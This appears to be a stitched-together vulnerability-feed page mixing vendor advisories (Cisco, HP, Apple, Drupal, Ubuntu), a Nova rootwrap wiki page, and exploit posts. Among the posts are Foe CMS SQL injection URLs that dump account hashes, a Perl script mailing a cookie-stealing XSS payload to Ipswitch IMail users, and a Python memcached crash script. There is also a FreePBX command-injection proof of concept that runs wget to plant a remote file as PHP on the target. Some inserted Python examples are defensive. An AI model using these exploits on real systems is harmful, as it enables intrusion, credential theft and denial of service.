AVE.CMS versions less than 2.09 suffer from a remote blind SQL injection vulnerability in the "module" parameter. This is a proof of concept exploit. This issue is addressed in later versions.
- Additional links:
- Name of Program: vBulletin 5b SQL Injection
- Developer website:
- Thread: Medium
-
Overview:
This is an SQL Injection proof of concept that will display information about the vBulletin software and the admin details from the database. It can be adjusted to read any part of the database.
- Additional links:
- Name of Program: Apple Security Advisory
- Developer website:
- Thread: High
-
Overview:
Apple Security Advisory 2013-05-22-1 - QuickTime 7.7.4 is now available and addresses multiple issues including buffer overflows and arbitrary code execution vulnerabilities.
- Additional links:
- Name of Program: Vivotek IP Camera Buffer Overflow / Disclosure / Injection
- Developer website:
- Thread: High
-
Overview:
Core Security Technologies Advisory - Vivotek IP Cameras suffer from information leak, buffer overflow, authentication, path traversal, and command injection vulnerabilities. Vulnerable are Vivotek PT7135 IP camera with firmware 0300a, Vivotek PT7135 IP camera with firmware 0400a, and possibly others.
- Additional links:
- Name of Program: HP Security Bulletin HPSBPI02869 SSRT100936
- Developer website:
- Thread: High
-
Overview:
HP Security Bulletin HPSBPI02869 SSRT100936 - A potential security vulnerability has been identified with HP LaserJet MFP printers, HP Color LaserJet MFP printers, and certain HP LaserJet printers. The vulnerability could be exploited remotely to gain unauthorized access to files. Revision 1 of this advisory.
- Additional links:
- Name of Program: Foe CMS 1.6.5 Cross Site Scripting / SQL Injection
- Developer website:
- Thread: High
-
Overview:
Foe CMS version 1.6.5 suffers from cross site scripting and remote SQL injection vulnerabilities.
Title: Foe CMS 1.6.5 SQL Injection Vulnerability
Vendor: http://foecms.com/
Download: http://code.google.com/p/foecms/downloads/list
Versions: 1.6.5
Platform: linux, windows
Bug: SQL Injection | Cross Site Scripting
-------------------------------------------------------
1) Introduction
2) Bug
3) Proof of concept
4) Credits
===========
1) Introduction
===========
Category manager (like phpBB3)
Move to object-oriented PHP
account_meta for signature, occupation, avatar, etc. (like WordPress); lets fields be added and removed at will
Permissions by rank for EVERYTHING
UCP page to change access permissions (friends and so on)
======
2) Bug
======
SQL Injection
http://victim/[path]/item.php?ei=[SQLi]
Cross Site Scripting
http://victim/[path]/item.php?ei=[XSS]
=====
3) Proof of concept
=====
Example SQLi
http://victim/[path]/item.php?ei=-1 union select 1,username,pass_sha,1,1,1,1,1,1 from foe_account--
Example XSS
http://victim/[path]/item.php?ei=<script>alert(1)</script>
- Additional links:
- Name of Program: Ipswitch IMail 11.01 Cross Site Scripting
- Developer website:
- Thread: High
-
Overview:
#!/usr/bin/perl
# Exploit Title: Ipswitch IMail 11.01 XSS Vulnerability
# Date: 26-04-2013
# Author: DaOne aka Mocking Bird
# Vendor Homepage: http://www.ipswitch.com/
# Platform: windows
use strict;
use warnings;
use Net::SMTP;
# ARGV Check
if ($#ARGV != 2)
{
    print "\nUSAGE: IMail.pl <Mail Server> <Attacker Email> <VicTim Email>\n";
    exit;
}
my $host     = $ARGV[0];
my $attacker = $ARGV[1];
my $victim   = $ARGV[2];
# Config SMTP
my $smtp = Net::SMTP->new( Host    => $host,
                           Hello   => 'Hello world',
                           Timeout => 30)
    or die "Couldn't connect to Mail Server\n";
# Attacker and Victim email (envelope sender and recipient)
$smtp->mail($attacker);
$smtp->to($victim);
# Build the message: a multipart/mixed body whose text/html part carries the
# script payload; it fires when the victim opens the mail in IMail's web client
my $buffer = "From: XSS\n".
    "To: testing\n".
    "Subject: testing\n".
    "MIME-Version: 1.0\n".
    "Content-Type: multipart/mixed;\n".
    " boundary=\"--=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019\"\n\n".
    "----=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019\n".
    "Content-Type: text/html;\n".
    "charset=\"utf-8\"\n".
    "Content-Transfer-Encoding: quoted-printable\n\n".
    "XSS\n".
    "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n".
    "<HTML><BODY>\n".
    "<script >alert(document.cookie)</script >\n".
    "</BODY></HTML>\n\n".
    "----=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019--";
# Send email
$smtp->data();
$smtp->datasend($buffer);
$smtp->dataend();   # terminate DATA with the closing "." so the server accepts the message
$smtp->quit();
- Additional links:
- Name of Program: Memcached Remote Denial Of Service
- Developer website:
- Thread: Medium
-
Overview:
Memcached denial of service exploit for an issue that was disclosed on the project's bug tracker two years ago and never patched.
#!/usr/bin/python
# Author: infodox // @info_dox
# Site: insecurety.net
# Old bug, still unpatched. Patch nao?
import sys
import socket

print("Memcached Remote DoS - Bursting Clouds yo!")
if len(sys.argv) != 3:
    print("Usage: %s <host> <port>" % (sys.argv[0]))
    sys.exit(1)
target = sys.argv[1]
port = sys.argv[2]
print("[+] Target Host: %s" % (target))
print("[+] Target Port: %s" % (port))
# Binary-protocol request (magic byte 0x80) whose total-body-length field is
# 0xffffffe8; the bytes are kept exactly as in the original exploit
kill = b"\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff"
kill += b"\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kill += b"\x00\xff\xff\xff\xff\x01\x00\x00\0xabad1dea"
hax = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    hax.connect((target, int(port)))
    print("[+] Connected, firing payload!")
except socket.error:
    print("[-] Connection Failed... Is there even a target?")
    sys.exit(1)
try:
    hax.send(kill)
    print("[+] Payload Sent!")
except socket.error:
    print("[-] Payload Sending Failure... WTF?")
    sys.exit(1)
hax.close()
print("[*] Should be dead...")
- Additional links:
- Name of Program: Mandriva Linux Security Advisory 2013-156
- Developer website:
- Thread: Low
-
Overview:
Mandriva Linux Security Advisory 2013-156 - ModSecurity before 2.7.3 allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service via an XML external entity declaration in conjunction with an entity reference, aka an XML External Entity vulnerability. The updated packages have been patched to correct this issue.
- Additional links:
- Name of Program: Joomla! 3.0.3 PHP Object Injection
- Developer website:
- Thread: Medium
-
Overview:
Joomla! versions 3.0.3 and below suffer from a PHP object injection vulnerability in remember.php.
- Additional links:
- Name of Program: FreePBX 2.9 Remote Command Execution
- Developer website:
- Thread: High
-
Overview:
# Title: FreePBX 2.9 Backup Module Remote Command Execution Vulnerability
# Author: Ahmed Aboul-Ela
# Contact: Ahmed.Aboul3la[at]gmail[dot]com
# Vendor: http://www.freepbx.org
# Software Link: http://mirror.freepbx.org/freepbx-2.9.0.tar.gz
# Version: 2.9 and prior versions should be affected too
# Tested on: Linux (Centos)
- Introduction:
FreePBX is a graphical user interface that controls and manages Asterisk, the world's most popular open source telephony engine.
FreePBX has been developed and hardened by thousands of volunteers over tens of thousands of man hours.
FreePBX has been downloaded over 5,000,000 times and an estimated 500,000 active phone systems run it.
- Vulnerability Explanation:
The vulnerability affects the "page.backup.php" file in the Backup Module of FreePBX 2.9 and leads to remote command execution.
The affected $dir parameter is sanitized in the code, but the sanitization has a weakness that can be used to bypass it.
The following if condition is used to sanitize the $dir variable in page.backup.php:
if (strstr($dir, '..') || strpos($dir, '\'') || strpos($dir, '"') || strpos($dir, '\'') || strpos($dir,'\`') ||
    strstr($file, '..') || strpos($file, '\'') || strpos($file, '"') || strpos($file, '\'') || strpos($file,'\`') ||
    strpos($id, '.') || strpos($id, '\'') || strpos($id, '"') || strpos($id, '\'') || strpos($id,'\`') ||
    strpos($filetype, '.') || strpos($filetype, '\'') || strpos($filetype, '"') || strpos($filetype, '\'') || strpos($filetype,'\`')) {
    print "You're trying to use an invalid character. Please don't.\n";
    exit;
}
It is meant to prevent $dir from containing single or double quotes by checking for them with strpos().
Unfortunately strpos() is easy to misuse this way. According to the php.net manual, strpos() returns an integer giving the position of the needle in the string, counting from 0, so the first position in a string is 0. That is the trick used to bypass the check.
If the single quote is the first character of $dir, strpos() returns 0. The if statement does not check the return type, only the value, so the 0 returned by strpos() is evaluated as a boolean rather than an integer. 0 as a boolean is FALSE, the condition is not met, the single quote is not detected and the check is bypassed :)
- Vulnerable Code Snippet at /admin/modules/backup/page.backup.php
LINE 25: $action = isset($_REQUEST['action'])?$_REQUEST['action']:'';
LINE 29: $dir=isset($_REQUEST['dir'])?$_REQUEST['dir']:'';
LINE 35: // The Sanitization code as mentioned
LINE 44: switch ($action) {
LINE 64: case "deletedataset":
LINE 65: exec("/bin/rm -rf '$dir'");
- Proof of Concept:
> To execute the command: wget http://site.com/file.txt -O file.php
http://[ip]/freepbx/admin/modules/backup/page.backup.php?action=deletedataset&dir=';wget http://site.com/file.txt -O file.php; echo 'mission done
> The evaluated command will be:
/bin/rm -rf '';wget http://site.com/file.txt -O file.php; echo 'mission done'
- Fix / Solution:
You should upgrade to version 2.10.
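The strpos() position-0 pitfall modelled in Python, as an added example that is not FreePBX code: a small strpos() stand-in that returns the index or False exactly as PHP does, the vulnerable condition and its strict-comparison fix side by side, and the LINE 65 command built both as written and with proper shell quoting. PAYLOAD is the dir value from the proof of concept above; everything else is constructed for the example.

```python
"""Position-0 truthiness bug behind the FreePBX $dir check.

Added example, not FreePBX's code. strpos() below models PHP's return
convention (0-based index, or False when absent) so the vulnerable
condition can be evaluated the way PHP evaluates it.
"""
import shlex


def strpos(haystack: str, needle: str):
    """Model of PHP strpos(): 0-based index of needle, or False when absent.
    The return is deliberately 'int or False', the ambiguity PHP has."""
    idx = haystack.find(needle)
    return False if idx == -1 else idx


def quote_check_vulnerable(value: str) -> bool:
    """The page's condition as PHP evaluates it: each strpos() result is used
    as a bare truth value, so index 0 (quote is the first character) counts
    as 'not found'. Returns True when the value is rejected."""
    return bool(strpos(value, "'") or strpos(value, '"') or strpos(value, "`"))


def quote_check_fixed(value: str) -> bool:
    """Same check with a strict type comparison (PHP: strpos(...) !== false)."""
    return any(strpos(value, c) is not False for c in ("'", '"', "`"))


def build_rm_command(value: str) -> str:
    """LINE 65 as written: single quotes around an interpolated string."""
    return "/bin/rm -rf '%s'" % value


def build_rm_command_safe(value: str) -> str:
    """shlex.quote escapes embedded quotes itself, so the shell sees one
    argument regardless of what a character blacklist missed."""
    return "/bin/rm -rf %s" % shlex.quote(value)


def safe_command_argv(value: str) -> list:
    """What a POSIX shell would actually split the safely quoted command into."""
    return shlex.split(build_rm_command_safe(value))


# The dir value from the proof of concept above.
PAYLOAD = "';wget http://site.com/file.txt -O file.php; echo 'mission done"


if __name__ == "__main__":
    print("blacklist rejects payload :", quote_check_vulnerable(PAYLOAD))  # False: bypassed
    print("strict check rejects it   :", quote_check_fixed(PAYLOAD))       # True
    print("shell would run           :", build_rm_command(PAYLOAD))
    print("with shlex.quote          :", safe_command_argv(PAYLOAD))
```

The strict comparison closes this particular bypass, but the blacklist is still the wrong tool: the argument reaches exec() through a shell, so quoting it (or avoiding the shell altogether) is what actually removes the injection, and the blacklist can then go.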
- Additional links:
- Name of Program: [USN-1124-1] rsync vulnerability
- Developer website:
- Thread: Low
-
Overview:
rsync could be made to crash or run programs as your login if it connected to a malicious server.
It was discovered that rsync incorrectly handled memory when certain recursion, deletion and ownership options were used. If a user were tricked into connecting to a malicious server, a remote attacker could cause a denial of service or execute arbitrary code with privileges of the user invoking the program.
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 10.10
- Ubuntu 10.04 LTS
- Ubuntu 9.10
-
Solution:
The problem can be corrected by updating your system to the following package versions:
- Ubuntu 10.10: rsync 3.0.7-2ubuntu1.1
- Ubuntu 10.04 LTS: rsync 3.0.7-1ubuntu1.1
- Ubuntu 9.10: rsync 3.0.6-1ubuntu1.1
In general, a standard system update will make all the necessary changes.
- Additional links:
- Name of Program: Node Reference URL Widget (Drupal third-party module): Cross-site scripting - Remote with user interaction
- Developer website:
- Thread: Medium
-
Overview:
The Node Reference URL Widget module adds a new widget to the Node Reference field type, allowing node reference fields to be auto-populated based on a value from the URL.
The module does not sanitize some of the user-supplied data before displaying it, leading to a Cross Site Scripting (XSS) vulnerability that may lead to a malicious user gaining full administrative access.
Versions affected
- Node Reference URL Widget module for Drupal 6 prior to 6.x-1.10.
- Node Reference URL Widget module for Drupal 7 prior to 7.x-1.10.
Drupal core is not affected. If you do not use the contributed Node Reference URL Widget module, there is nothing you need to do.
-
Solution:
Install the latest version:
- If you use the Node Reference URL Widget module for Drupal 6.x upgrade to Node Reference URL Widget 6.x-1.10.
- If you use the Node Reference URL Widget module for Drupal 7.x upgrade to Node Reference URL Widget 7.x-1.10.
See also the Node Reference URL Widget project page.
- Additional links:
- Name of Program: Save Draft (Drupal third-party module): Reduced security - Unknown/unspecified
- Developer website:
- Thread: Medium
-
Overview:
The Save Draft module adds a "Save as draft" button to the node form, letting content creators easily save a post in unpublished draft form.
The module adds validation to individual form actions, thereby bypassing any form-wide validation that is normally performed before saving content. This is a security vulnerability for sites where other modules are using node validation for security purposes.
Versions affected
- Save Draft module for Drupal 6.x versions prior to 6.x-1.8
- Save Draft module for Drupal 7.x versions prior to 7.x-1.4
Drupal core is not affected. If you do not use the contributed Save Draft module, there is nothing you need to do.
-
Solution:
Install the latest version:
- If you use the Save Draft module for Drupal 6.x, upgrade to Save Draft 6.x-1.8. (Note that the 6.x-2.x branch of the module is not affected. If you use that, you do not need to upgrade.)
- If you use the Save Draft module for Drupal 7.x, upgrade to Save Draft 7.x-1.4.
See also the Save Draft project page.
- Additional links:
- Name of Program: Nova root wrapper
- Developer website:
- Thread: High
-
Overview:
Nova root wrapper
Architecture
Purpose
The goal of the root wrapper is to allow the nova unprivileged user to run a number of actions as the root user, in the safest manner possible. Historically, Nova used a specific sudoers file listing every command that the nova user was allowed to run, and just used sudo to run that command as root. However this was difficult to maintain (the sudoers file was in packaging), and did not allow for complex filtering of parameters (advanced filters). The rootwrap was designed to solve those issues.
How rootwrap works
Instead of just calling sudo make me a sandwich, Nova calls sudo nova-rootwrap /etc/nova/rootwrap.conf make me a sandwich. A generic sudoers entry lets the nova user run nova-rootwrap as root. nova-rootwrap looks for filter definition directories in its configuration file, and loads command filters from them. Then it checks if the command requested by Nova matches one of those filters, in which case it executes the command (as root). If no filter matches, it denies the request.
Security model
The escalation path is fully controlled by the root user. A sudoers entry (owned by root) allows nova to run (as root) a specific rootwrap executable, and only with a specific configuration file (which should be owned by root). nova-rootwrap imports the Python modules it needs from a cleaned (and system-default) PYTHONPATH. The configuration file (also root-owned) points to root-owned filter definition directories, which contain root-owned filters definition files. This chain ensures that the nova user itself is not in control of the configuration or modules used by the nova-rootwrap executable.
Rootwrap for users
Nova configuration
You must provide the location of the rootwrap configuration file to Nova, by setting the following in nova.conf:
rootwrap_config=/etc/nova/rootwrap.conf
The configuration file used here must match the one defined in the sudoers entry (see below), otherwise the commands will be rejected! There is no need to specify the root_helper parameter anymore.
Rootwrap for packagers
Sudoers entry
Packagers need to make sure that Nova nodes contain a sudoers entry that lets the nova user run nova-rootwrap as root, pointing to the root-owned rootwrap.conf configuration file and allowing any parameter after that:
nova ALL = (root) NOPASSWD: /usr/bin/nova-rootwrap /etc/nova/rootwrap.conf *
Filters path
Nova looks for a filters_path in rootwrap.conf, which contains the directories it should load filter definition files from. It is recommended that Nova-provided filters files are loaded from /usr/share/nova/rootwrap and extra user filters files are loaded from /etc/nova/rootwrap.d.
[DEFAULT]
filters_path=/etc/nova/rootwrap.d,/usr/share/nova/rootwrap
Directories defined on this line should all exist, be owned and writeable only by the root user.
Filter definitions
Finally, packaging needs to install, for each node, the filters definition file that corresponds to it. You should not install any other filters file on that node, otherwise you would allow extra unneeded commands to be run by nova as root.
The filter file corresponding to the node must be installed in one of the filters_path directories (preferably /usr/share/nova/rootwrap). For example, on compute nodes, you should only have /usr/share/nova/rootwrap/compute.filters. The file should be owned and writeable only by the root user.
All filter definition files can be found in Nova source code under etc/nova/rootwrap.d.
Rootwrap for plug-in writers
Adding new run-as-root commands
Plug-in writers may need to have the nova user run additional commands as root. They should use nova.utils.execute(run_as_root=True) to achieve that. They should create their own filter definition file and install it (owned and writeable only by the root user!) into one of the filters_path directories (preferably /etc/nova/rootwrap.d). For example the foobar plugin could define its extra filters in a /etc/nova/rootwrap.d/foobar.filters file.
The format of the filter file is defined below, in the Reference section.
Rootwrap for core developers
Adding new run-as-root commands
Core developers may need to have the nova user run additional commands as root. They should use nova.utils.execute(run_as_root=True) to achieve that, and add a filter for the command they need in the corresponding etc/nova/rootwrap.d/ .filters file in Nova's source code. For example, to add a command that needs to be run by network nodes, they should modify the etc/nova/rootwrap.d/network.filters file.
The format of the filter file is defined below, in the Reference section.
Adding your own filter types
The default filter type, CommandFilter, is pretty basic. It only checks that the command name matches, it does not perform advanced checks on the command arguments. A number of other more command-specific filter types are available, see the Reference section for details.
That said, you can easily define new filter types to further control what exact command you actually allow the nova user to run as root. See nova/rootwrap/filters.py for details.
Reference
rootwrap.conf
The rootwrap.conf file is used to influence how nova-rootwrap works. Since it's in the trusted security path, it needs to be owned and writeable only by the root user. Its location is specified both in the sudoers entry and in the Nova configuration file.
It uses an INI file format with the following sections and parameters:
[DEFAULT]
filters_path
Comma-separated list of directories containing filter definition files. All directories listed must be owned and only writeable by root.
filters_path=/etc/nova/rootwrap.d,/usr/share/nova/rootwrap
.filters files
Filters definition files contain lists of filters that nova-rootwrap will use to allow or deny a specific command. They are generally suffixed by .filters. Since they are in the trusted security path, they need to be owned and writeable only by the root user. Their location is specified in the rootwrap.conf file.
It uses an INI file format with a [Filters] section and several lines, each with a unique parameter name (different for each filter you define):
[Filters]
filter_name (different for each filter)
Comma-separated list containing first the Filter class to use, followed by that Filter arguments (which vary depending on the Filter class selected).
kpartx: CommandFilter, /sbin/kpartx, root
See below for parameters to each Filter classes.
-
Solution:
Available Filter classes
CommandFilter
Generic basic filter that only checks the executable called. Parameters are:
- Executable allowed
- User to run the command under
Example: allow the nova user to run /sbin/kpartx as the root user, with any parameters: kpartx: CommandFilter, /sbin/kpartx, root
RegExpFilter
Generic filter that checks the executable called, then uses a list of regular expressions to check all subsequent arguments. Parameters are:
- Executable allowed
- User to run the command under
- (and following) Regular expressions to use to match first (and subsequent) command arguments
Example: allow the nova user to run tunctl, but only with three parameters with the first two being -b and -t: tunctl: RegExpFilter, /usr/sbin/tunctl, root, -b, -t, .*
ReadFileFilter
Specific filter that lets you read files as root using cat. Parameters are:
- Path to the file that you want to read as the root user.
Example: allow the nova user to run "cat /etc/iscsi/initiatorname.iscsi" as root: read_initiator: ReadFileFilter, /etc/iscsi/initiatorname.iscsi
KillFilter
Kill-specific filter that checks the affected process and the signal sent before allowing the command. Parameters are:
- User to run kill under
- Only affect processes running that executable
- (and following) Signals you're allowed to send
Example: allow the nova user to send -9 or -HUP signals to /usr/sbin/dnsmasq processes: kill_dnsmasq: KillFilter, root, /usr/sbin/dnsmasq, -9, -HUP
DnsmasqFilter
Very specific filter that will allow to run dnsmasq as root with the FLAGFILE and NETWORK_ID environment variables set. The command should be called like this: FLAGFILE=foo NETWORK_ID=bar dnsmasq... Parameters are:
- Executable to use for dnsmasq
- User to run dnsmasq under
Example: allow the nova user to run FLAGFILE=foo NETWORK_ID=bar dnsmasq ... as root: dnsmasq: DnsmasqFilter, /usr/sbin/dnsmasq, root
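A minimal model of the filter chain described in this reference, as an added example: it is not nova-rootwrap's own code, but a Python implementation of the .filters file format above and of the two filter classes whose matching rules the page spells out (CommandFilter checks the executable name only; RegExpFilter additionally requires exactly one argument per regular expression, each matching in full). SAMPLE_FILTERS is constructed for the example; the basename comparison and the argument-count rule are this model's reading of the documented behaviour.

```python
"""Minimal model of the rootwrap filter chain.

Added example, not nova-rootwrap's code. Parses a .filters file in the
documented [Filters] INI layout and implements CommandFilter and
RegExpFilter as the reference above describes them. SAMPLE_FILTERS is
constructed for the example.
"""
import configparser
import os
import re
import shlex

SAMPLE_FILTERS = """\
[Filters]
kpartx: CommandFilter, /sbin/kpartx, root
tunctl: RegExpFilter, /usr/sbin/tunctl, root, -b, -t, .*
"""


class CommandFilter:
    """Allows any invocation whose command name matches the executable."""

    def __init__(self, exec_path, run_as, *args):
        self.exec_path = exec_path
        self.run_as = run_as
        self.args = args

    def match(self, userargs):
        return bool(userargs) and os.path.basename(userargs[0]) == os.path.basename(self.exec_path)

    def get_command(self, userargs):
        # The executable actually run comes from the root-owned filter, not
        # from whatever path the (unprivileged) caller typed.
        return [self.exec_path] + list(userargs[1:])


class RegExpFilter(CommandFilter):
    """Additionally requires exactly len(args) arguments, each fully matching
    its regular expression (anchored at both ends)."""

    def match(self, userargs):
        if not super().match(userargs):
            return False
        args = userargs[1:]
        if len(args) != len(self.args):
            return False
        return all(re.fullmatch(pattern, arg) for pattern, arg in zip(self.args, args))


FILTER_CLASSES = {"CommandFilter": CommandFilter, "RegExpFilter": RegExpFilter}


def load_filters(text: str) -> list:
    """Parse one .filters file: 'name: Class, exec_path, run_as, arg, ...'."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(text)
    filters = []
    for _name, spec in parser.items("Filters"):
        fields = [f.strip() for f in spec.split(",")]
        cls = FILTER_CLASSES[fields[0]]      # unknown class: KeyError, refuse to load
        filters.append(cls(*fields[1:]))
    return filters


def authorize(filters: list, cmdline: str):
    """Return (run_as, argv) for the first matching filter, or None to deny."""
    userargs = shlex.split(cmdline)
    for flt in filters:
        if flt.match(userargs):
            return flt.run_as, flt.get_command(userargs)
    return None


if __name__ == "__main__":
    fs = load_filters(SAMPLE_FILTERS)
    for cmd in ("kpartx -a /dev/loop0", "tunctl -b -t tap0",
                "tunctl -b -t tap0 extra", "rm -rf /"):
        print("%-28s -> %s" % (cmd, authorize(fs, cmd)))
```

Two points the model makes visible: the executable path in the filter replaces whatever the caller supplied, so a nova user cannot substitute a binary of its own even when the name matches; and the trailing .* in the tunctl filter still accepts an arbitrary third argument, which is why the reference encourages writing tighter filter types rather than relying on RegExpFilter alone.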
Wiki: Nova/Rootwrap (last edited by user ThierryCarrez 2012-08-03 12:09:30)
- Additional links:
- Name of Program: Cisco Wireless LAN Controllers Denial of Service Vulnerability
- Developer website:
- Thread: High
-
Overview:
Cisco WLCs and Cisco WiSMs are responsible for system-wide wireless LAN functions, such as security policies, intrusion prevention, RF management, quality of service (QoS), and mobility.
These devices communicate with controller-based access points over any Layer 2 (Ethernet) or Layer 3 (IP) infrastructure using the Lightweight Access Point Protocol (LWAPP) and the Control and Provisioning of Wireless Access Points (CAPWAP) protocol.
The Cisco WLC family of devices is affected by a DoS vulnerability that can allow an unauthenticated attacker to cause the device to reload by sending a series of ICMP packets. This vulnerability can be exploited from both wired and wireless segments.
This vulnerability is documented in Cisco bug ID CSCth74426 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2011-1613.
Vulnerable Products
This vulnerability affects Cisco WLC software versions 6.0 and later. The following products are affected by the vulnerability described in this Security Advisory:
- Cisco 2100 Series Wireless LAN Controllers
- Cisco WLC526 Mobility Express Controller (AIR-WLC526-K9)
- Cisco NME-AIR-WLC Modules for Integrated Services Routers (ISRs)
- Cisco NM-AIR-WLC Modules for Integrated Services Routers (ISRs)
Note: The Cisco NM-AIR-WLC have reached End-of-Life and End-of-Software Maintenance. Please refer to the following document for more information: http://www.cisco.com/en/US/prod/collateral/modules/ps2797/prod_end-of-life_notice0900aecd806aeb34.html
Determination of Software Versions
Administrators can use these instructions to determine the software version that is running on a Cisco WLC using the web or command-line interface or on a Cisco WiSM (using commands on a Cisco Catalyst 6500 Series Switch and Cisco 7600 Series Router).
Cisco Wireless Controllers
To determine the WLC version that is running in a given environment, use one of the following methods:
- In the web interface, choose the Monitor tab, click Summary in the left pane, and note the Software Version field.
- From the command-line interface, type show sysinfo and note the Product Version field, as shown in the example that follows.
Note: Customers who use a Cisco WLC Module in an ISR will need to issue the service-module wlan-controller <slot/port> session command before running show sysinfo on the command line. Customers who use a Cisco Catalyst 3750G Switch with an integrated WLC Module will need to issue the session <Stack-Member-Number> processor 1 command first.
(Cisco Controller)> show sysinfo
Manufacturer's Name.. Cisco Systems Inc.
Product Name......... Cisco Controller
Product Version...... 5.1.151.0
RTOS Version......... Linux-2.6.10_mvl401
Bootloader Version... 4.0.207.0
Build Type........... DATA + WPS
<output suppressed>
Cisco WiSMs
Use the show wism module <module number> controller 1 status command on Cisco Catalyst 6500 Series Switch and Cisco 7600 Series Routers that have a WiSM installed. Note the software version as demonstrated in this example, which shows version 5.1.151.0:
Router# show wism module 3 controller 1 status
WiSM Controller 1 in Slot 3
Operational Status of the Controller : Oper-Up
Service VLAN : 192
Service Port : 10
Service Port Mac Address : 0011.92ff.8742
Service IP Address : 192.168.10.1
Management IP Address : 192.168.1.123
Software Version : 5.1.151.0
Port Channel Number : 288
Allowed vlan list : 30,40
Native VLAN ID : 40
WCP Keep Alive Missed : 0
Products Confirmed Not Vulnerable
The following Cisco Wireless LAN Controllers are not affected by this vulnerability:
- Cisco 2000 Series WLCs
- Cisco 2500 Series WLCs
- Cisco 4100 Series WLCs
- Cisco 4400 Series WLCs
- Cisco Catalyst 3750G Integrated WLCs
- Cisco 5500 Series WLCs
- Cisco Wireless Services Modules (WiSMs, both WiSM and WiSM2)
- Cisco Wireless Services Ready Engine (SRE) Modules
- Cisco Flex 7500 Series Cloud Controllers
No other Cisco products are currently known to be affected by this vulnerability.
Successful exploitation of this vulnerability could cause an affected device to reload. Repeated exploitation could result in a sustained DoS condition.
-
Solution:
Obtaining Fixed Software
Cisco has released free software updates that address this vulnerability. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Software Versions and Fixes
When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.
If a given release train is vulnerable, then the earliest possible releases that contain the fix (along with the anticipated date of availability for each, if applicable) are listed in the "First Fixed Release" column of the table. A device running a release in the given train that is earlier than the release in a specific column (less than the First Fixed Release) is known to be vulnerable.
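An added example, not part of the Cisco advisory, that applies the rule just stated to captured CLI output using the release table that follows. It parses either a show sysinfo capture (Product Version) or a show wism ... status capture (Software Version), and compares the running release with its train's First Fixed Release. The verdict is only meaningful for the hardware listed as affected above; trains the table does not cover are reported as unknown rather than guessed. The 6.0.100.0 capture is constructed.

```python
"""Added example, not from the Cisco advisory: triage WLC CLI output against the
"First Fixed Release" rule, using the release table from this advisory."""
import re

# Release train -> First Fixed Release from the advisory table; None = "Not Vulnerable".
# The 4.1M / 4.2M maintenance trains cannot be told apart from 4.1 / 4.2 by version
# number alone, but all four are marked Not Vulnerable, so the outcome is the same.
FIRST_FIXED = {
    "4.0": None, "4.1": None, "4.2": None,
    "5.0": None, "5.1": None, "5.2": None,
    "6.0": "6.0.200.0",
}

# Matches "Product Version...... 5.1.151.0" and "Software Version\n: 5.1.151.0".
VERSION_RE = re.compile(r"(?:Product Version|Software Version)[.\s]*:?\s*(\d+(?:\.\d+)+)")


def parse_version(cli_output):
    """Return the running version as a tuple of ints, e.g. (5, 1, 151, 0)."""
    match = VERSION_RE.search(cli_output)
    if not match:
        raise ValueError("no Product Version / Software Version field in output")
    return tuple(int(part) for part in match.group(1).split("."))


def assess(version, table=FIRST_FIXED):
    """Apply the advisory rule: a release below its train's First Fixed Release is vulnerable."""
    train = f"{version[0]}.{version[1]}"
    if train not in table:
        return train, "unknown train"      # not in the table; consult the advisory directly
    fixed = table[train]
    if fixed is None:
        return train, "not vulnerable"
    fixed_tuple = tuple(int(part) for part in fixed.split("."))
    return train, ("vulnerable" if version < fixed_tuple else "fixed")


# Sample captures: the first two are the advisory's own examples, the third is constructed.
SAMPLE_SYSINFO = """(Cisco Controller)> show sysinfo
Manufacturer's Name.. Cisco Systems Inc.
Product Name......... Cisco Controller
Product Version...... 5.1.151.0
RTOS Version......... Linux-2.6.10_mvl401
Bootloader Version... 4.0.207.0
"""
SAMPLE_WISM = "Management IP Address\n: 192.168.1.123\nSoftware Version\n: 5.1.151.0\n"
SAMPLE_UNPATCHED_60 = "Product Version...... 6.0.100.0\n"   # constructed, below 6.0.200.0

if __name__ == "__main__":
    for capture in (SAMPLE_SYSINFO, SAMPLE_WISM, SAMPLE_UNPATCHED_60):
        version = parse_version(capture)
        print(".".join(map(str, version)), "->", assess(version))
```

Pair the version verdict with the product list above: a 6.0.1xx release on a platform that is confirmed not vulnerable (for example a 5500 Series controller) needs no emergency change, while the same release on a 2100 Series or NM/NME module does.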
Affected Release    First Fixed Release
4.0                 Not Vulnerable
4.1                 Not Vulnerable
4.1M                Not Vulnerable
4.2                 Not Vulnerable
4.2M                Not Vulnerable
5.0                 Not Vulnerable
5.1                 Not Vulnerable
5.2                 Not Vulnerable
6.0                 6.0.200.0
- Additional links:
- Name of Program: Multiple Vulnerabilities in Cisco Unified Communications Manager
- Developer website:
- Thread: High
-
Overview:
Cisco Unified Communications Manager is the call processing component of the Cisco IP Telephony solution that extends enterprise telephony features and functions to packet telephony network devices such as IP phones, media processing devices, VoIP gateways, and multimedia applications.
DoS Vulnerabilities in SIP
Cisco Unified Communications Manager contains three DoS vulnerabilities that involve the processing of SIP messages. Each vulnerability is triggered by a malformed SIP message that could cause a critical process to fail, resulting in the disruption of voice services. All SIP ports (TCP ports 5060 and 5061 and UDP ports 5060 and 5061) are affected.
